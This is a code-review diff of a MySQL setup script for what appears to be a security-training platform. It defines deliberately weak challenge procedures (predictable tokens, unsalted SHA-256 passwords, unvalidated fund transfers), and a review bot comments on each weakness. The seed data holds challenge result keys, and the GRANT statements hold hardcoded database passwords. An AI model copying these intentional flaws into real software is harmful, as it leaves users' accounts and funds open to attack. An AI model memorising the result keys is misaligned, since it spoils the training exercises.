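Review bot: `getToken` builds the token as `SHA2(CONCAT(RAND(), now()), 256)`, and hashing does not add entropy to those inputs: `RAND()` is not a cryptographic generator and `now()` is a timestamp. Unless token predictability is part of the level, take the value from a CSPRNG, e.g. `SHA2(RANDOM_BYTES(32), 256)` where the server provides `RANDOM_BYTES()`, or generate it in the application with `SecureRandom` and pass it in. Separately, the count-then-insert sequence is not atomic, so two concurrent calls for the same `theUserId` would have the second INSERT rejected by `userId_UNIQUE`. The caller should be checked for how it handles that error.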
@@ -1815,15 +1010,12 @@ END
-- DELIMITER ;
-- validToken Procedure
-USE
-`securityMisconfigStealToken`;
+USE `securityMisconfigStealToken`;
-- DELIMITER $$
-CREATE PROCEDURE `securityMisconfigStealToken`.`validToken`(IN theUserId VARCHAR (64), theToken VARCHAR (64))
+CREATE PROCEDURE `securityMisconfigStealToken`.`validToken` (IN theUserId VARCHAR(64), theToken VARCHAR(64))
BEGIN
COMMIT;
-SELECT count(token)
-FROM `securityMisconfigStealToken`.`tokens`
-WHERE userId != theUserId AND token = theToken;
+SELECT count(token) FROM `securityMisconfigStealToken`.`tokens` WHERE userId != theUserId AND token = theToken;
END
;
-- $$
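Review bot: `validToken` counts rows where `userId != theUserId AND token = theToken`, which reads like an inverted condition to a maintainer who does not know the level. If the intent is that the level is passed by presenting a token that belongs to another user, a comment above the procedure should state it, e.g. `-- Returns 1 when theToken belongs to a user other than theUserId (level success condition); this is not a session validity check`. The second parameter also has no explicit mode; `IN theToken VARCHAR(64)` would match the style `transferFunds` uses for its parameters.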
@@ -1837,79 +1029,47 @@ COMMIT;
-- DirectObjectBank Schema
-- -----------------------------------------------------
-- -----------------------------------------------------
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES';
-DROP SCHEMA IF EXISTS `directObjectBank`;
-CREATE SCHEMA IF NOT EXISTS `directObjectBank` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci;
-USE
-`directObjectBank` ;
+DROP SCHEMA IF EXISTS `directObjectBank` ;
+CREATE SCHEMA IF NOT EXISTS `directObjectBank` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci ;
+USE `directObjectBank` ;
-- -----------------------------------------------------
-- Table `directObjectBank`.`bankAccounts`
-- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `directObjectBank`.`bankAccounts`
-(
- `account_number`
- INT
- NOT
- NULL
- AUTO_INCREMENT,
- `account_holder`
- VARCHAR
-(
- 45
-) NOT NULL,
- `account_password` VARCHAR
-(
- 191
-) NOT NULL,
- `account_balance` FLOAT NOT NULL DEFAULT 5,
- PRIMARY KEY
-(
- `account_number`
-),
- UNIQUE INDEX `account_holder_UNIQUE`
-(
- `account_holder` ASC
-))
- ENGINE = InnoDB;
-
-
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+CREATE TABLE IF NOT EXISTS `directObjectBank`.`bankAccounts` (
+ `account_number` INT NOT NULL AUTO_INCREMENT,
+ `account_holder` VARCHAR(45) NOT NULL,
+ `account_password` VARCHAR(191) NOT NULL,
+ `account_balance` FLOAT NOT NULL DEFAULT 5,
+ PRIMARY KEY (`account_number`),
+ UNIQUE INDEX `account_holder_UNIQUE` (`account_holder` ASC))
+ENGINE = InnoDB;
+
+
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
-- -----------------------------------------------------
-- Data for table `directObjectBank`.`bankAccounts`
-- -----------------------------------------------------
START TRANSACTION;
-USE
-`directObjectBank`;
-INSERT INTO `directObjectBank`.`bankAccounts` (`account_number`, `account_holder`, `account_password`,
- `account_balance`)
-VALUES (0, 'Mr. Banks', 'SignInImpossibleBecauseNotHashed', 10000000000);
+USE `directObjectBank`;
+INSERT INTO `directObjectBank`.`bankAccounts` (`account_number`, `account_holder`, `account_password`, `account_balance`) VALUES (0, 'Mr. Banks', 'SignInImpossibleBecauseNotHashed', 10000000000);
COMMIT;
-- BankAuth Procedure
-USE
-`directObjectBank`;
+USE `directObjectBank`;
-- DELIMITER $$
-CREATE PROCEDURE `directObjectBank`.`bankAuth`(IN theUserId VARCHAR (45), thePass VARCHAR (191))
+CREATE PROCEDURE `directObjectBank`.`bankAuth` (IN theUserId VARCHAR(45), thePass VARCHAR(191))
BEGIN
COMMIT;
-SELECT account_number, account_holder
-FROM `directObjectBank`.`bankAccounts`
-WHERE account_holder = theUserId
- AND account_password = SHA2(thePass, 256);
+SELECT account_number, account_holder FROM `directObjectBank`.`bankAccounts` WHERE account_holder = theUserId AND account_password = SHA2(thePass, 256);
END
;
-- $$
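Review bot: `bankAuth` compares `account_password` with `SHA2(thePass, 256)`, an unsalted single-pass digest, and `createAccount` (hunk at -1954) stores the same form, so identical passwords produce identical stored values and the digest is cheap to test offline. If password storage is not what this level teaches, hash in the application with a salted password KDF (bcrypt, scrypt or Argon2) and have the procedure return the stored hash for `account_holder` so the comparison happens there; otherwise document the choice in a comment above `bankAuth`. Separately, the seed row inserts `account_number` 0 into an AUTO_INCREMENT column after `SQL_MODE` has been restored. Unless the session mode includes `NO_AUTO_VALUE_ON_ZERO`, MySQL assigns the next sequence value instead of 0, so any code that expects Mr. Banks at account 0 should be checked.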
@@ -1917,15 +1077,12 @@ END
-- DELIMITER ;
-- CurrentFunds Procedure
-USE
-`directObjectBank`;
+USE `directObjectBank`;
-- DELIMITER $$
-CREATE PROCEDURE `directObjectBank`.`currentFunds`(IN theBankAccountNumber VARCHAR (45))
+CREATE PROCEDURE `directObjectBank`.`currentFunds` (IN theBankAccountNumber VARCHAR(45))
BEGIN
COMMIT;
-SELECT account_balance
-FROM `directObjectBank`.`bankAccounts`
-WHERE account_number = theBankAccountNumber;
+SELECT account_balance FROM `directObjectBank`.`bankAccounts` WHERE account_number = theBankAccountNumber;
END
;
-- $$
@@ -1933,19 +1090,17 @@ END
-- DELIMITER ;
-- transferFunds Procedure
-USE
-`directObjectBank`;
+USE `directObjectBank`;
-- DELIMITER $$
-CREATE PROCEDURE `directObjectBank`.`transferFunds`(IN theGiverAccountNumber VARCHAR (45),
- IN theRecieverAccountNumber VARCHAR (45), IN theAmmount FLOAT)
+CREATE PROCEDURE `directObjectBank`.`transferFunds` (IN theGiverAccountNumber VARCHAR(45), IN theRecieverAccountNumber VARCHAR(45), IN theAmmount FLOAT)
BEGIN
COMMIT;
UPDATE `directObjectBank`.`bankAccounts`
-SET account_balance = account_balance - theAmmount
-WHERE account_number = theGiverAccountNumber;
+ SET account_balance = account_balance - theAmmount
+ WHERE account_number = theGiverAccountNumber;
UPDATE `directObjectBank`.`bankAccounts`
-SET account_balance = account_balance + theAmmount
-WHERE account_number = theRecieverAccountNumber;
+ SET account_balance = account_balance + theAmmount
+ WHERE account_number = theRecieverAccountNumber;
COMMIT;
END
;
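Review bot: `transferFunds` runs the debit and the credit as two independent UPDATEs with no `START TRANSACTION;` before the first one, so if the connection runs with autocommit on, an error in the second statement leaves the giver debited and the receiver not credited. The procedure also accepts any `theAmmount`, including a negative value or more than the giver holds; confirm the calling servlet validates this, or add a comment that it is left open for the level. `account_balance` is `FLOAT`, which keeps about seven significant digits, so small credits to a balance the size of the 10000000000 seed are rounded away; `DECIMAL(19,2)` is the usual type for money. The account-number parameters are `VARCHAR(45)` compared with an INT column, which makes MySQL coerce the string to a number; declaring them `INT` would reject non-numeric input at the call, and the same applies to `currentFunds` in the previous hunk.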
@@ -1954,14 +1109,12 @@ END
-- DELIMITER ;
-- createAccount Procedure
-USE
-`directObjectBank`;
+USE `directObjectBank`;
-- DELIMITER $$
-CREATE PROCEDURE `directObjectBank`.`createAccount`(IN accountHolder VARCHAR (45), IN accountPassword VARCHAR (191))
+CREATE PROCEDURE `directObjectBank`.`createAccount` (IN accountHolder VARCHAR(45), IN accountPassword VARCHAR(191))
BEGIN
COMMIT;
-INSERT INTO `directObjectBank`.`bankAccounts` (`account_holder`, `account_password`, `account_balance`)
-VALUES (accountHolder, SHA2(accountPassword, 256), 0);
+INSERT INTO `directObjectBank`.`bankAccounts` (`account_holder`, `account_password`, `account_balance`) VALUES (accountHolder, SHA2(accountPassword, 256), 0);
COMMIT;
END
;
@@ -1975,77 +1128,48 @@ COMMIT;
-- SQL Stored Proecure Challenge
-- ======================================================
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
-DROP SCHEMA IF EXISTS `SqlChalStoredProc`;
-CREATE SCHEMA IF NOT EXISTS `SqlChalStoredProc` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;
-USE
-`SqlChalStoredProc` ;
+DROP SCHEMA IF EXISTS `SqlChalStoredProc` ;
+CREATE SCHEMA IF NOT EXISTS `SqlChalStoredProc` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci ;
+USE `SqlChalStoredProc` ;
-- -----------------------------------------------------
-- Table `SqlChalStoredProc`.`customers`
-- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `SqlChalStoredProc`.`customers`
-(
- `customerId` VARCHAR
-(
- 64
-) NOT NULL ,
- `customerName` VARCHAR
-(
- 32
-) NOT NULL ,
- `customerAddress` VARCHAR
-(
- 128
-) NOT NULL ,
- `comment` LONGTEXT NULL ,
- PRIMARY KEY
-(
- `customerId`
-) )
- ENGINE = InnoDB;
-
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+CREATE TABLE IF NOT EXISTS `SqlChalStoredProc`.`customers` (
+ `customerId` VARCHAR(64) NOT NULL ,
+ `customerName` VARCHAR(32) NOT NULL ,
+ `customerAddress` VARCHAR(128) NOT NULL ,
+ `comment` LONGTEXT NULL ,
+ PRIMARY KEY (`customerId`) )
+ENGINE = InnoDB;
+
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
-- -----------------------------------------------------
-- Data for table `SqlChalStoredProc`.`customers`
-- -----------------------------------------------------
START TRANSACTION;
-USE
-`SqlChalStoredProc`;
-INSERT INTO `SqlChalStoredProc`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`)
-VALUES ('019ce129ee8960a6b875b20095705d53f8c7b0ca', 'John Fits', 'crazycat@example.com', NULL);
-INSERT INTO `SqlChalStoredProc`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`)
-VALUES ('44e2bdc1059903f464e5ba9a34b927614d7fee55', 'Rita Hanolan', 'the1night2before3four@exampleEmails.com',
- 'Well Done! The Result key is d9c5757c1c086d02d491cbe46a941ecde5a65d523de36ac1bfed8dd4dd9994c8');
-INSERT INTO `SqlChalStoredProc`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`)
-VALUES ('05159435826869ccfd76d77a2ed4ba7c2023f0cb', 'Rubix Man', 'manycolours@cube.com', NULL);
-INSERT INTO `SqlChalStoredProc`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`)
-VALUES ('6c5c26a1deccf4a87059deb0a3fb463ff7d62fd5', 'Paul O Brien', 'sixshooter@deaf.com', NULL);
+USE `SqlChalStoredProc`;
+INSERT INTO `SqlChalStoredProc`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`) VALUES ('019ce129ee8960a6b875b20095705d53f8c7b0ca', 'John Fits', 'crazycat@example.com', NULL);
+INSERT INTO `SqlChalStoredProc`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`) VALUES ('44e2bdc1059903f464e5ba9a34b927614d7fee55', 'Rita Hanolan', 'the1night2before3four@exampleEmails.com', 'Well Done! The Result key is d9c5757c1c086d02d491cbe46a941ecde5a65d523de36ac1bfed8dd4dd9994c8');
+INSERT INTO `SqlChalStoredProc`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`) VALUES ('05159435826869ccfd76d77a2ed4ba7c2023f0cb', 'Rubix Man', 'manycolours@cube.com', NULL);
+INSERT INTO `SqlChalStoredProc`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`) VALUES ('6c5c26a1deccf4a87059deb0a3fb463ff7d62fd5', 'Paul O Brien', 'sixshooter@deaf.com', NULL);
COMMIT;
-- findUser Procedure
-USE
-`SqlChalStoredProc`;
+USE `SqlChalStoredProc`;
-- DELIMITER $$
-CREATE PROCEDURE `SqlChalStoredProc`.`findUser`(IN theAddress VARCHAR (128))
+CREATE PROCEDURE `SqlChalStoredProc`.`findUser` (IN theAddress VARCHAR(128))
BEGIN
COMMIT;
-SELECT *
-FROM customers
-WHERE customerAddress = theAddress;
+SELECT * FROM customers WHERE customerAddress = theAddress;
END
;
-- $$
@@ -2060,64 +1184,38 @@ COMMIT;
-- SQL Injection Poor Escaping (email)
-- ======================================================
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
-DROP SCHEMA IF EXISTS `SqlPoorEscape`;
-CREATE SCHEMA IF NOT EXISTS `SqlPoorEscape` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;
-USE
-`SqlPoorEscape` ;
+DROP SCHEMA IF EXISTS `SqlPoorEscape` ;
+CREATE SCHEMA IF NOT EXISTS `SqlPoorEscape` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci ;
+USE `SqlPoorEscape` ;
-- -----------------------------------------------------
-- Table `SqlPoorEscape`.`customers`
-- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `SqlPoorEscape`.`customers`
-(
- `customerId` VARCHAR
-(
- 64
-) NOT NULL ,
- `customerName` VARCHAR
-(
- 32
-) NOT NULL ,
- `customerAddress` VARCHAR
-(
- 35
-) NOT NULL ,
- `comment` LONGTEXT NULL ,
- PRIMARY KEY
-(
- `customerId`
-) )
- ENGINE = InnoDB;
-
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+CREATE TABLE IF NOT EXISTS `SqlPoorEscape`.`customers` (
+ `customerId` VARCHAR(64) NOT NULL ,
+ `customerName` VARCHAR(32) NOT NULL ,
+ `customerAddress` VARCHAR(35) NOT NULL ,
+ `comment` LONGTEXT NULL ,
+ PRIMARY KEY (`customerId`) )
+ENGINE = InnoDB;
+
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
-- -----------------------------------------------------
-- Data for table `SqlPoorEscape`.`customers`
-- -----------------------------------------------------
START TRANSACTION;
-USE
-`SqlPoorEscape`;
-INSERT INTO `SqlPoorEscape`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`)
-VALUES ('019h53d60a6b875b20095705d53f8c7b0ca', 'John Fits', 'thislifecouldbethelast@example.com', NULL);
-INSERT INTO `SqlPoorEscape`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`)
-VALUES ('44e2bdc105ifdua464e5ba9a34b927614d7fee55', 'Rita Hanolan', 'dontfoolyourself@example.com',
- 'Well Done! The Result key is 0dcf9078ba5d878f9e23809ac8f013d1a08fdc8f12c5036f1a4746dbe86c0aac');
-INSERT INTO `SqlPoorEscape`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`)
-VALUES ('051594asdjd6869ccfd76d77a2ed4ba7c2023f0cb', 'Rubix Man', 'dontkidyourself@cube.com', NULL);
-INSERT INTO `SqlPoorEscape`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`)
-VALUES ('6c5c26adjdccf4a87059deb0a3fb463ff7d62fd5', 'Paul O Brien', 'andweretooyoungtosee@deaf.com', NULL);
+USE `SqlPoorEscape`;
+INSERT INTO `SqlPoorEscape`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`) VALUES ('019h53d60a6b875b20095705d53f8c7b0ca', 'John Fits', 'thislifecouldbethelast@example.com', NULL);
+INSERT INTO `SqlPoorEscape`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`) VALUES ('44e2bdc105ifdua464e5ba9a34b927614d7fee55', 'Rita Hanolan', 'dontfoolyourself@example.com', 'Well Done! The Result key is 0dcf9078ba5d878f9e23809ac8f013d1a08fdc8f12c5036f1a4746dbe86c0aac');
+INSERT INTO `SqlPoorEscape`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`) VALUES ('051594asdjd6869ccfd76d77a2ed4ba7c2023f0cb', 'Rubix Man', 'dontkidyourself@cube.com', NULL);
+INSERT INTO `SqlPoorEscape`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`) VALUES ('6c5c26adjdccf4a87059deb0a3fb463ff7d62fd5', 'Paul O Brien', 'andweretooyoungtosee@deaf.com', NULL);
COMMIT;
@@ -2129,480 +1227,155 @@ COMMIT;
-- -----------------------------------------------------
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
commit;
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'userLookUuuup'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'userLookUuuup'@'localhost';
-CREATE
-USER 'userLookUuuup'@'localhost' IDENTIFIED BY 'youMomaSoTh1n';
-GRANT
-SELECT
-ON `SqlChalSix`.`users` TO 'userLookUuuup'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'DnTPubUser'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'DnTPubUser'@'localhost';
-CREATE
-USER 'DnTPubUser'@'localhost' IDENTIFIED BY 'ch3fBrownSa4useIsS00000Go0d';
-GRANT
-SELECT
-ON `SQLiC5Shop`.`items` TO 'DnTPubUser'@'localhost';
-GRANT
-SELECT
-ON `SQLiC5Shop`.`coupons` TO 'DnTPubUser'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'DnTVipUser'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'DnTVipUser'@'localhost';
-CREATE
-USER 'DnTVipUser'@'localhost' IDENTIFIED BY 'ch3fBrownSa4useIsS00000Go0d';
-GRANT
-SELECT
-ON `SQLiC5Shop`.`items` TO 'DnTVipUser'@'localhost';
-GRANT
-SELECT
-ON `SQLiC5Shop`.`vipCoupons` TO 'DnTVipUser'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'DnTPurUser'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'DnTPurUser'@'localhost';
-CREATE
-USER 'DnTPurUser'@'localhost' IDENTIFIED BY 'ch3fBrownSa4useIsS00000Go0d';
-GRANT
-SELECT
-ON `SQLiC5Shop`.`items` TO 'DnTPurUser'@'localhost';
-GRANT
-SELECT
-ON `SQLiC5Shop`.`coupons` TO 'DnTPurUser'@'localhost';
-GRANT
-SELECT
-ON `SQLiC5Shop`.`vipCoupons` TO 'DnTPurUser'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'firstBloodyMessL'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'firstBloodyMessL'@'localhost';
-CREATE
-USER 'firstBloodyMessL'@'localhost' IDENTIFIED BY 'firstBlooded';
-GRANT
-SELECT
-ON `SqlInjLesson`.`tb_users` TO 'firstBloodyMessL'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'CharlieSeabrook'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'CharlieSeabrook'@'localhost';
-CREATE
-USER 'CharlieSeabrook'@'localhost' IDENTIFIED BY 'shallowHal';
-GRANT
-SELECT
-ON `SqlChalEmail`.`customers` TO 'CharlieSeabrook'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'RightGuard3d'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'RightGuard3d'@'localhost';
-CREATE
-USER 'RightGuard3d'@'localhost' IDENTIFIED BY 'logic3Speaker';
-GRANT
-SELECT
-ON `SqlChalOne`.`customers` TO 'RightGuard3d'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'HdmiNoSignal'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'HdmiNoSignal'@'localhost';
-CREATE
-USER 'HdmiNoSignal'@'localhost' IDENTIFIED BY '1nforma1ion';
-GRANT
-SELECT
-ON `SqlChalThree`.`customers` TO 'HdmiNoSignal'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'randomUserName'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'randomUserName'@'localhost';
-CREATE
-USER 'randomUserName'@'localhost' IDENTIFIED BY 'c4utionHoT';
-GRANT
-SELECT
-ON `BrokenAuthAndSessMangChalTwo`.`users` TO 'randomUserName'@'localhost';
-GRANT
-UPDATE ON `BrokenAuthAndSessMangChalTwo`.`users` TO 'randomUserName'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'doveM3nCare'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'doveM3nCare'@'localhost';
-CREATE
-USER 'doveM3nCare'@'localhost' IDENTIFIED BY 'plusm0r3';
-GRANT
-SELECT
-ON `BrokenAuthAndSessMangChalThree`.`users` TO 'doveM3nCare'@'localhost';
-GRANT
-UPDATE ON `BrokenAuthAndSessMangChalThree`.`users` TO 'doveM3nCare'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'murr4yFe1ld'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'murr4yFe1ld'@'localhost';
-CREATE
-USER 'murr4yFe1ld'@'localhost' IDENTIFIED BY '4gainst3ngl4nd';
-GRANT
-SELECT
-ON `directObjectRefChalOne`.`users` TO 'murr4yFe1ld'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'d3nn1sM4nely'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'd3nn1sM4nely'@'localhost';
-CREATE
-USER 'd3nn1sM4nely'@'localhost' IDENTIFIED BY 'Pr0ductM4rket1ngIssu3s';
-GRANT
-SELECT
-ON `directObjectRefChalTwo`.`users` TO 'd3nn1sM4nely'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'secureDood'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'secureDood'@'localhost';
-CREATE
-USER 'secureDood'@'localhost' IDENTIFIED BY 'iCantEv3n';
-GRANT
-SELECT
-ON `SqlChalFourSuperSecure`.`users` TO 'secureDood'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'csrfChalEnuer'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'csrfChalEnuer'@'localhost';
-CREATE
-USER 'csrfChalEnuer'@'localhost' IDENTIFIED BY 'c4n1bUplZ';
-GRANT
-SELECT
-ON `csrfChallengeEnumTokens`.`csrfTokens` TO 'csrfChalEnuer'@'localhost';
-GRANT
-INSERT
-ON
-`csrfChallengeEnumTokens`
-.
-`csrfTokens`
-TO
-'csrfChalEnuer'@'localhost';
-GRANT
-UPDATE ON `csrfChallengeEnumTokens`.`csrfTokens` TO 'csrfChalEnuer'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'l3tsg0cra'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'l3tsg0cra'@'localhost';
-CREATE
-USER 'l3tsg0cra'@'localhost' IDENTIFIED BY '83ururMa';
-GRANT
-SELECT
-ON `BrokenAuthAndSessMangChalFive`.`users` TO 'l3tsg0cra'@'localhost';
-GRANT
-UPDATE ON `BrokenAuthAndSessMangChalFive`.`users` TO 'l3tsg0cra'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'csrfChalFour'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'csrfChalFour'@'localhost';
-CREATE
-USER 'csrfChalFour'@'localhost' IDENTIFIED BY 'R1n13U2pv';
-GRANT
-SELECT
-ON `csrfChallengeFour`.`csrfTokens` TO 'csrfChalFour'@'localhost';
-GRANT
-INSERT
-ON
-`csrfChallengeFour`
-.
-`csrfTokens`
-TO
-'csrfChalFour'@'localhost';
-GRANT
-UPDATE ON `csrfChallengeFour`.`csrfTokens` TO 'csrfChalFour'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'randomMoFoName'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'randomMoFoName'@'localhost';
-CREATE
-USER 'randomMoFoName'@'localhost' IDENTIFIED BY 'c2zXlq_ZoT';
-GRANT
-SELECT
-ON `BrokenAuthAndSessMangChalSix`.`users` TO 'randomMoFoName'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'randomFlower'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'randomFlower'@'localhost';
-CREATE
-USER 'randomFlower'@'localhost' IDENTIFIED BY 'c21-le_6oT';
-GRANT
-SELECT
-ON `BrokenAuthAndSessMangChalSeven`.`users` TO 'randomFlower'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'tSwsfUSer'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'tSwsfUSer'@'localhost';
-CREATE
-USER 'tSwsfUSer'@'localhost' IDENTIFIED BY '9s31iusd-n';
-GRANT
-SELECT
-ON `CryptShop`.`items` TO 'tSwsfUSer'@'localhost';
-GRANT
-SELECT
-ON `CryptShop`.`coupons` TO 'tSwsfUSer'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'yourOrEll'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'yourOrEll'@'localhost';
-CREATE
-USER 'yourOrEll'@'localhost' IDENTIFIED BY '91dj3:766f';
-GRANT
-SELECT
-ON `UrlAccessThree`.`users` TO 'yourOrEll'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'r1ndomFlower'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'r1ndomFlower'@'localhost';
-CREATE
-USER 'r1ndomFlower'@'localhost' IDENTIFIED BY 'c41-l2_6oT';
-GRANT
-SELECT
-ON `sqlInjectSeven`.`users` TO 'r1ndomFlower'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'al1th3Tokens'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'al1th3Tokens'@'localhost';
-CREATE
-USER 'al1th3Tokens'@'localhost' IDENTIFIED BY '87SDO63yUN.';
-GRANT
-SELECT
-ON `securityMisconfigStealToken`.`tokens` TO 'al1th3Tokens'@'localhost';
-GRANT
-INSERT
-ON
-`securityMisconfigStealToken`
-.
-`tokens`
-TO
-'al1th3Tokens'@'localhost';
-GRANT EXECUTE ON PROCEDURE `securityMisconfigStealToken`.`getToken` TO
-'al1th3Tokens'@'localhost';
-GRANT EXECUTE ON PROCEDURE `securityMisconfigStealToken`.`validToken` TO
-'al1th3Tokens'@'localhost';
-
-GRANT USAGE ON *.* TO
-'theBankMan'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'theBankMan'@'localhost';
-CREATE
-USER 'theBankMan'@'localhost' IDENTIFIED BY 'B4ndkm.M98n';
-GRANT
-SELECT
-ON `directObjectBank`.`bankAccounts` TO 'theBankMan'@'localhost';
-GRANT
-INSERT
-ON
-`directObjectBank`
